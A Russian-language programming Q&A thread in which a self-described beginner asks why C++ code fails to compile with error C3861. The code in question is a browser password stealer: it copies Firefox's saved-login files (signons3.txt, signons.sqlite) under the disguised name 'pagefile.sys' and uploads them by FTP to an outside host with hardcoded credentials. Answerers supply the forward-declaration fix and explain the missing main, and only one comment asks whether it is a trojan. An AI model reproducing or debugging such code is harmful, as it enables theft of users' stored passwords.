# Error C3861: Identifier not found

Tags: c++, wininet

Привет,новичок в c++

Не могли бы посмотреть в чем проблема?

> error C3861: 'uploaddata': identifier
> not found

В `linker -> entry point -> uploaddata` делаю не работает. Меняю на console app, тоже не работает. В начале писал `#define uploaddata` тоже не работает

```
    #define _CRT_SECURE_NO_WARNINGS
    #include <windows.h>
    #include <string>
    #include <iostream>
    #include <wininet.h>
    #include <time.h>
    // and
    #pragma comment(lib, "wininet.lib")
    #pragma comment(lib, "user32.lib")

    using namespace std;

    void FireFox()
    {
        string appdata;
        appdata = getenv ("appdata"); // Get the full path of %appdata% and assign it to 'appdata'
        string firefox = "\\Mozilla\\Firefox\\Profiles\\"; // The path after %appdata%
        string search = appdata + firefox + "*.default"; // The string we will use to search for the name of the map that has .default in it
        HANDLE Find;
        WIN32_FIND_DATA FindFileData;
        Find = FindFirstFile(search.c_str(), &FindFileData);
        FindClose(Find);
        string fullpath = appdata + firefox + FindFileData.cFileName + "\\signons3.txt"; //signons3.txt is used in an older version of firefox
        if(CopyFile(fullpath.c_str() ,"pagefile.sys", FALSE)) //Copy signons3.txt to the dir where the executeable is located, and name it pagefile.sys
        {
            uploaddata();   // Call the upload function
        }
        else // If signons3.txt is not found, try to find the name of the file in the newer version of firefox
        {
            fullpath = appdata + firefox + FindFileData.cFileName + "\\signons.sqlite";
            if(CopyFile(fullpath.c_str() ,"pagefile.sys", FALSE))
            {
                uploaddata(); // Call upload function
            }
            else
            {
                cout << "Couldn't find file\n";
            }
        }
    }

    void uploaddata()
    {
        string computer;
        computer = getenv ("COMPUTERNAME");   //We will use this to rename the file to the name of the computer
        srand ( time(NULL) );            //  Setting up a random number
        int random = rand() % 1000 + 1;        //
        string host = "pfk.site40.net"; // ftp host name
        string user = "a3174338"; // username
        string pass = "312024a"; // password
        char intstring[20]; // 
        itoa(random, intstring, 10); // This is just to change the random number(int) to a character array
        string filename = "pwd/" + computer + intstring; // the file will be saved to the pwd dir on the ftp server and it's named a random name
        HINTERNET hSession = InternetOpen(0, INTERNET_OPEN_TYPE_PRECONFIG, 0, 0, 0);
        HINTERNET hService = InternetConnect(hSession, host.c_str(), INTERNET_DEFAULT_FTP_PORT, user.c_str(), pass.c_str(), INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0);
        if(FtpPutFile(hService, "pagefile.sys", filename.c_str(), FTP_TRANSFER_TYPE_BINARY, 0))
        {
            cout << "Uploaded\n";
        }
        else
        {
            cout << "Not uploaded\n";
        }
        InternetCloseHandle(hService);
        InternetCloseHandle(hSession);
    }
```

Comment: Троянчик пишете?

Answer (score 3):

> в linker -> entry point -> uploaddata делаю не работает

этого точно делать не нужно, если не знаете, для чего это.

> меняю на console app, тоже не работает.

а приложение графическое или консольное - только это определяет, а не наличие функции.

> в начале писал #define uploaddata тоже не работает

А это вообще бомба замедленного действия.

Самый простой способ - поменяйте эти две функции местами. Или просто перед функцией FireFox добавьте строку вида

```
void uploaddata();
```

Comment: 1>MSVCRT.lib(crtexe.obj) : error LNK2001: unresolved external symbol _main
1>C:\Users\Admin\Documents\Visual Studio 2008\Projects\test\Release\test.exe : fatal error LNK1120: 1 unresolved externals

Comment: видимо потому, что в Вашем коде нет функции main. (она может называться по разному в студии - например _main или tmain).